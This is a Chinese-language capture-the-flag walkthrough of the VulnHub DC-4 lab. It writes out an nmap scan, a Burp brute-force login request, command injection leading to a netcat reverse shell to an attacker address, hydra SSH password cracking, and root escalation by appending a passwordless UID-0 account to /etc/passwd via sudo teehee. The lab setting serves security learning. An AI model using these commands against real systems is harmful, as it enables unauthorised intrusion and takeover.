DC-4是另一個專門構建的易受攻擊的實驗室,目的是在滲透測試領域積累經驗。
與以前的DC版本不同,此版本主要為初學者/中級用戶設計。只有一個標誌,但是從技術上講,有多個入口點,就像上次一樣,沒有任何線索
靶機地址:https://www.vulnhub.com/entry/dc-4,313/
這邊靶機和前一個是一樣的,只需要獲取一個Flag就行了,在/root目錄下!
學習到的知識Burpsuite枚舉弱密碼命令執行反彈shellhydra爆破ssh teehee權限提升
信息搜集拿到IP先對它進行埠掃描:
nmap -A -T4 192.168.1.100圖片這邊掃描出來靶機開放了22(ssh),80(http)埠,先從80埠來入侵:
圖片Burpsuite枚舉弱密碼:後發現是一個登陸的頁面,我嘗試了常規的弱口令admin,admin123無果,隨後我又嘗試了一遍SQL注入,並沒有注入點!這個時候就需要掏出我的字典來了來配合Burp爆破:
POST /login.php HTTP/1.1Host: 192.168.1.100User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.100/Content-Type: application/x-www-form-urlencodedContent-Length: 30Connection: closeCookie: PHPSESSID=lddqa4ven9a9qqf8ua9tlurj35Upgrade-Insecure-Requests: 1
username=admin&password=§123456§burp枚舉弱密碼1burp枚舉弱密碼2爆破成功後得到密碼happy,隨後攜帶帳號和密碼登陸到了後臺,在後臺發現可以執行查看文件的操作:
執行查看文件操作命令執行反彈shell這個時候想到了命令執行,whoami看了看權限是一個網站普通權限:
whoami回顯我們先用nc反彈一個shell回來把,kali監聽4444埠,在radio變量輸入nc反彈的地址成功反彈一枚shell:
nc -e /bin/sh 192.168.1.128 4444反彈殼我們先讓它得到一個bash把:
python -c 'import pty;pty.spawn("/bin/bash")'hydra爆破ssh之後我是在/home/jim目錄裡發現了一個歷史密碼的備份文件:
歷史密碼備份文件既然得到了密碼,就那麼用九頭蛇來爆破把:
hydra -l jim -P pass ssh://192.168.1.100 -t 10九頭蛇爆破爆破成功後得到jim的密碼為jibril04,後來我登陸到了jim用戶:
ssh連結登陸之後我習慣性的sudo -l發現需要密碼:
須藤-l回顯緊接著我在jim的目錄下發現了一個文件,文件裡好像是一封郵件信息:
From root@dc-4 Sat Apr 06 20:20:04 2019Return-path: <root@dc-4>Envelope-to: jim@dc-4Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000Received: from root by dc-4 with local (Exim 4.89) (envelope-from <root@dc-4>) id 1hCiQe-0000gc-EC for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000To: jim@dc-4Subject: TestMIME-Version: 1.0Content-Type: text/plain; charset="UTF-8"Content-Transfer-Encoding: 8bitMessage-Id: <E1hCiQe-0000gc-EC@dc-4>From: root <root@dc-4>Date: Sat, 06 Apr 2019 20:20:04 +1000Status: RO
This is a test.
郵件信息好像沒得啥子用處!最後我在郵箱目錄找到了另一封郵件:
另一篇郵件信息讀完這封郵件我得到了charles告訴jim的一個重要信息,也就是charles的密碼!
獲取到密碼後我切換到了charles用戶:
切換charles用戶teehee權限提升切換用戶之後我又是習慣性的sudo -l發現charles用戶可以以root身份去運行teehee命令:
用root身份身份運性teehee命令我緊接著寫入了一個帳號saul到passwd裡:
echo "saul::0:0:::/bin/bash" | sudo teehee -a /etc/passwd#注釋:#[用戶名]:[密碼]:[UID]:[GID]:[身份描述]:[主目錄]:[登錄shell]寫入passwd拿到標誌最後也是在/root目錄下拿到了Flag〜
往期連結:
VulnHub通關日記-DC_1-Walkthrough
VulnHub通關日記-DC_2-Walkthrough
VulnHub通關日記-DC_3-Walkthrough